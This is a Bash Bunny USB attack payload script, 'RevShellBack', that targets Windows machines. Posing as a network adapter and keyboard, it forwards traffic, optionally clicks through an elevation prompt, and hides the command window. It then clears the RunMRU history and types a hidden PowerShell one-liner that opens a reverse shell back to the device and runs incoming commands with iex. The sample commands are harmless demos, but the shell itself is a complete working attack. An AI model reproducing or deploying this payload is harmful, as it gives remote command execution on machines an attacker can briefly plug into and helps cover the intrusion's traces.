#!/bin/bash
#
# Title:         RevShellBack
# Description:   Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
# Author:        NodePoint
# Version:       0.1.3
# Category:      Execution
# Target:        Windows
# Attackmodes:   Ethernet, HID

# Set attack mode
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID

# Set variables
GET HOST_IP
GET TARGET_HOSTNAME
# Netcat port number
NCPORT=4444
# Delay before attempting to connect to the netcat listener (ms)
NCDELAY=200
ADMIN=false

# Setup networking
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A INPUT -i usb0 -p tcp --dport $NCPORT -j ACCEPT
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport $NCPORT -j DNAT --to-destination $HOST_IP:$NCPORT

# Open CMD
LED STAGE1
if [ "$ADMIN" = true ] ; then
    # Bypass UAC
    RUN WIN powershell -c "Start-Process cmd -verb runas"
    Q DELAY 1500
    Q ALT Y
    Q DELAY 300
    # Hide CMD
    Q STRING "mode 18,1 & color FE & cd C:\ & title "
    Q ENTER
else
    # Run as normal user
    RUN WIN cmd /K "mode 18,1 & color FE & cd C:\ & title "
    Q DELAY 150
fi

# Initiate reverse shell
LED STAGE2
Q STRING "powershell -W Hidden \"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue;Start-Sleep -m $NCDELAY;\$sm=(New-Object Net.Sockets.TCPClient('$HOST_IP',$NCPORT)).GetStream();[byte[]]\$bt=0..65535|%{0};while((\$i=\$sm.Read(\$bt,0,\$bt.Length)) -ne 0){;\$d=(New-Object Text.ASCIIEncoding).GetString(\$bt,0,\$i);\$st=([text.encoding]::ASCII).GetBytes((iex \$d 2>&1));\$sm.Write(\$st,0,\$st.Length)}\" & exit"
Q ENTER

# Attack -- commands go within EOF
LED SPECIAL1
nc -q 0 -l -p $NCPORT <<EOF
echo "Hello. :)" > "C:/Users/\$env:username/Desktop/reverseshelled.txt"
\$Eject = New-Object -ComObject "Shell.Application";\$Eject.Namespace(17).Items() | Where-Object { \$_.Type -eq "CD Drive" } | foreach { \$_.InvokeVerb("Eject") }
calc;
Start-Sleep -m 300;Add-Type -AssemblyName PresentationCore,PresentationFramework;[System.Windows.MessageBox]::Show("Hello, \$env:username.\`nYour PC name is '$TARGET_HOSTNAME'.\`n\`nCheck your desktop for the file 'reverseshelled.txt'.\`nIf you have a CD/DVD drive with a disc tray, check that too.",'RevShellBack','Ok','Info')
EOF

# Done
ATTACKMODE OFF
LED FINISH